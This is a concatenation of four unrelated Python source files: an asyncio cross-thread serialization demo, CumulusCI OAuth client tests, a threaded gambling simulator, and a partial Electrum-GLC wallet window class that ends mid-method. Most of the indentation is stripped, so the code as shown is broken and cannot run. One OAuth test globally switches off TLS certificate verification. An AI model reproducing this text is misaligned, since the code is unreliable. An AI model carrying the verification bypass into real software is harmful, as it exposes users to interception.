custom_loop.py

import asyncio
import logging
import threading
import time
from concurrent.futures import ThreadPoolExecutor
class AsyncioLoggingFilter(logging.Filter):
def filter(self, record):
        try:
            task = asyncio.current_task()  # asyncio.Task.current_task() was removed in Python 3.9
        except RuntimeError:
            task = None  # no event loop running in this thread
record.task = f'[task {id(task)}]' if task else '[NOLOOP ]'
return True
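# Logging setup: tag every record with the id of the asyncio task that emitted it
# (or '[NOLOOP ]' when no task is running).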
logger = logging.getLogger(__name__)
logger.addFilter(AsyncioLoggingFilter())
logging.getLogger('asyncio').setLevel(logging.CRITICAL)
logging.basicConfig(level=logging.INFO, format="%(msecs)f %(threadName)s %(task)s %(msg)s")
thread_pool_executor = ThreadPoolExecutor(thread_name_prefix="dispatch")
class ThreadSerializedTask(asyncio.Task):
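    # A single class-level lock shared by all loops/threads: resuming a task after an
    # await happens while holding it, so the synchronous sections of a coroutine are
    # never interleaved with those running on other threads.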
_lock = threading.Lock()
def _wakeup(self, *args, **kwargs):
logger.debug("Acquire lock")
ThreadSerializedTask._lock.acquire()
super()._wakeup(*args, **kwargs)
logger.debug("Releasing lock")
ThreadSerializedTask._lock.release()
def task_factory(loop, coro):
return ThreadSerializedTask(coro, loop=loop)
async def one():
await asyncio.sleep(0.01)
logger.debug("-> One")
await two()
await asyncio.sleep(0.01)
logger.debug("-> Exiting one")
async def two():
await asyncio.sleep(0.01)
logger.info("--> Should not be interleaved with other threads")
time.sleep(0.01)
logger.info("--> Should not be interleaved with other threads")
time.sleep(0.01)
logger.info("--> Should not be interleaved with other threads")
def run_loop():
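    # Each thread runs its own event loop; the task factory makes every task a
    # ThreadSerializedTask so wakeups are serialized across threads.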
loop = asyncio.new_event_loop()
loop.set_task_factory(task_factory)
loop.run_until_complete(one())
if __name__ == '__main__':
threads = []
for _ in range(0, 5):
thread = threading.Thread(target=run_loop)
thread.start()
threads.append(thread)
    for t in threads:
        t.join()

test_client.py

import http.client
import pytest
import responses
import ssl
import sys
import threading
import time
import urllib.error
import urllib.parse
import urllib.request
from contextlib import contextmanager
from requests.models import Response
from unittest import mock
from cumulusci.core.exceptions import SalesforceCredentialsException
from cumulusci.core.keychain.base_project_keychain import DEFAULT_CONNECTED_APP_PORT
from cumulusci.oauth.client import OAuth2Client
from cumulusci.oauth.client import PORT_IN_USE_ERR
from cumulusci.oauth.exceptions import OAuth2Error
from cumulusci.oauth.salesforce import jwt_session
@responses.activate
@mock.patch("cumulusci.oauth.salesforce.jwt.encode")
def test_jwt_session(encode):
    # Mock the call to jwt.encode so we don't need to generate
    # a private key that would have to be committed to the repo
error = "Yeti"
responses.add(
responses.POST,
"https://login.salesforce.com/services/oauth2/token",
body=error,
status=400,
)
with pytest.raises(
SalesforceCredentialsException, match=f"Error retrieving access token: {error}"
):
jwt_session("client_id", "server_key", "username")
@pytest.fixture
def client_config():
return {
"client_id": "foo_id",
"client_secret": "foo_secret",
"auth_uri": "https://login.salesforce.com/services/oauth2/authorize",
"token_uri": "https://login.salesforce.com/services/oauth2/token",
"redirect_uri": "http://localhost:7788/callback",
"scope": "web full refresh_token",
"prompt": "login",
}
@pytest.fixture
def client(client_config):
return OAuth2Client(client_config)
@pytest.fixture
def http_client(client_config):
client_config = client_config.copy()
client_config["redirect_uri"] = "http://localhost:8080/callback"
return OAuth2Client(client_config)
@contextmanager
@mock.patch("time.sleep", time.sleep) # undo mock from conftest
def httpd_thread(oauth_client):
# call OAuth object on another thread - this spawns local httpd
thread = threading.Thread(target=oauth_client.auth_code_flow)
thread.start()
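    # poll until the OAuth client has created its local HTTP server
    # (or the worker thread has died)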
while thread.is_alive():
if oauth_client.httpd:
break
time.sleep(0.01)
assert (
oauth_client.httpd
), "HTTPD did not start. Perhaps port 8080 cannot be accessed."
try:
yield oauth_client
finally:
oauth_client.httpd.shutdown()
thread.join()
@mock.patch("webbrowser.open", mock.MagicMock(return_value=None))
class TestOAuth2Client:
@responses.activate
def test_refresh_token(self, client):
responses.add(
responses.POST,
"https://login.salesforce.com/services/oauth2/token",
body=b'{"message":"SENTINEL"}',
)
info = client.refresh_token("token")
assert "SENTINEL" == info["message"]
@responses.activate
def test_auth_code_flow___http(self, http_client):
expected_response = {
"access_token": "abc123",
"id_token": "abc123",
"token_type": "Bearer",
"signature": "abc123",
"issued_at": "12345",
"scope": "web full refresh_token",
"instance_url": "https://na15.salesforce.com",
"id": "https://login.salesforce.com/id/abc/xyz",
"refresh_token": "abc123",
}
responses.add(
responses.POST,
"https://login.salesforce.com/services/oauth2/token",
status=http.client.OK,
json=expected_response,
)
# call OAuth object on another thread - this spawns local httpd
with httpd_thread(http_client) as oauth_client:
# simulate callback from browser
response = urllib.request.urlopen(
http_client.client_config.redirect_uri + "?code=123"
)
assert oauth_client.response.json() == expected_response
assert b"Congratulations" in response.read()
@responses.activate
def test_auth_code_flow___https(self, client):
expected_response = {
"access_token": "abc123",
"id_token": "abc123",
"token_type": "Bearer",
"signature": "abc123",
"issued_at": "12345",
"scope": "web full refresh_token",
"instance_url": "https://na15.salesforce.com",
"id": "https://login.salesforce.com/id/abc/xyz",
"refresh_token": "abc123",
}
responses.add(
responses.POST,
"https://login.salesforce.com/services/oauth2/token",
status=http.client.OK,
json=expected_response,
)
# use https for callback
client.client_config.redirect_uri = "https://localhost:8080/callback"
# squash CERTIFICATE_VERIFY_FAILED from urllib
# https://stackoverflow.com/questions/49183801/ssl-certificate-verify-failed-with-urllib
ssl._create_default_https_context = ssl._create_unverified_context
# call OAuth object on another thread - this spawns local httpd
with httpd_thread(client) as oauth_client:
# simulate callback from browser
response = urllib.request.urlopen(
oauth_client.client_config.redirect_uri + "?code=123"
)
assert oauth_client.response.json() == expected_response
assert b"Congratulations" in response.read()
@responses.activate
def test_oauth_flow_error_from_auth(self, client):
# mock response for SalesforceOAuth2.get_token()
expected_response = {
"access_token": "abc123",
"id_token": "abc123",
"token_type": "Bearer",
"signature": "abc123",
"issued_at": "12345",
"scope": "web full refresh_token",
"instance_url": "https://na15.salesforce.com",
"id": "https://login.salesforce.com/id/abc/xyz",
"refresh_token": "abc123",
}
responses.add(
responses.POST,
"https://login.salesforce.com/services/oauth2/token",
status=http.client.OK,
json=expected_response,
)
# call OAuth object on another thread - this spawns local httpd
with httpd_thread(client):
# simulate callback from browser
with pytest.raises(urllib.error.HTTPError):
urllib.request.urlopen(
client.client_config.redirect_uri
+ "?error=123&error_description=broken"
)
@pytest.mark.skipif(
sys.platform.startswith("win"), reason="setup differs from windows"
)
def test_create_httpd__port_already_in_use(self, client):
with httpd_thread(client):
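            # the server started by httpd_thread is already bound to the
            # callback port, so creating a second one must fail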
with pytest.raises(
OAuth2Error, match=PORT_IN_USE_ERR.format(DEFAULT_CONNECTED_APP_PORT)
):
client._create_httpd()
@mock.patch("cumulusci.oauth.client.HTTPServer")
def test_create_httpd__other_OSError(self, HTTPServer, client):
message = "generic error message"
HTTPServer.side_effect = OSError(message)
with pytest.raises(OSError, match=message):
client._create_httpd()
@responses.activate
def test_oauth_flow_error_from_token(self, client):
# mock response for OAuth2Client.get_access_token()
responses.add(
responses.POST,
"https://login.salesforce.com/services/oauth2/token",
status=http.client.FORBIDDEN,
)
# call OAuth object on another thread - this spawns local httpd
with httpd_thread(client):
# simulate callback from browser
with pytest.raises(urllib.error.HTTPError):
urllib.request.urlopen(client.client_config.redirect_uri + "?code=123")
def test_validate_response__raises_error(self, client):
response = Response()
response.status_code = 400
with pytest.raises(OAuth2Error):
client.validate_response(response)

table.py

import threading
import queue as Queue  # the stdlib Queue module was renamed to queue in Python 3
from gamblers.simple_bettor import simple_bettor
from gamblers.double_bettor import double_bettor
from gamblers.dAlembert import dAlembert
def table(args):
'''
Simple table for gamblers
'''
pool = []
queue = Queue.Queue()
player_results = []
players_at_table = args[4]
for i in range(players_at_table):
t = threading.Thread(target=dAlembert, args=(args, queue))
pool.append(t)
t.start()
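        # block until a result is available before seating the next player,
        # so the gamblers effectively play one at a time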
response = queue.get()
player_results.append(response)
for thread in pool:
thread.join()
return player_results

main_window.py

#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal, QPoint
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum
from electrum.gui import messages
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME,
InvoiceError, parse_max_spend)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnInvoiceException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit, SizedFreezableLineEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
from .rbf_dialog import BumpFeeDialog, DSCancelDialog
from .qrreader import scan_qrcode
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
# note: this class has a custom stylesheet applied in stylesheet_patcher.py
def __init__(self, icon, tooltip, func):
QToolButton.__init__(self)
self.setText('')
self.setIcon(icon)
self.setToolTip(tooltip)
self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.setAutoRaise(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [Qt.Key_Return, Qt.Key_Enter]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
if wallet.has_lightning():
self.wallet.config.set_key('show_channels_tab', True)
Exception_Hook.maybe_setup(config=self.config, wallet=self.wallet)
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self._cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QScrollArea()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
self.setMinimumWidth(640)
self.setMinimumHeight(400)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
self._update_check_thread = None
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def run_coroutine_from_thread(self, coro, on_result=None):
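        # Submit the coroutine to the network's asyncio loop from the wallet's
        # TaskThread; the result (or any error) is reported back on the GUI side.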
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
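            # resolve the OpenAlias on a background daemon thread so the GUI
            # does not block on the DNS lookup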
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
        t.daemon = True  # Thread.setDaemon() is deprecated; set the attribute instead
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
        # Once the GUI has been initialized, check whether we want to announce anything,
        # since the callback may have been called before the GUI existed
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
        except Exception:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-GLC"
if constants.net.TESTNET:
name += " " + constants.net.NET_NAME.capitalize()
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Goldcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return False
backup_dir = self.config.get_backup_dir()
if backup_dir is None:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not configured"))
return
try:
new_path = self.wallet.save_backup(backup_dir)
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
return True
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
        except Exception:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
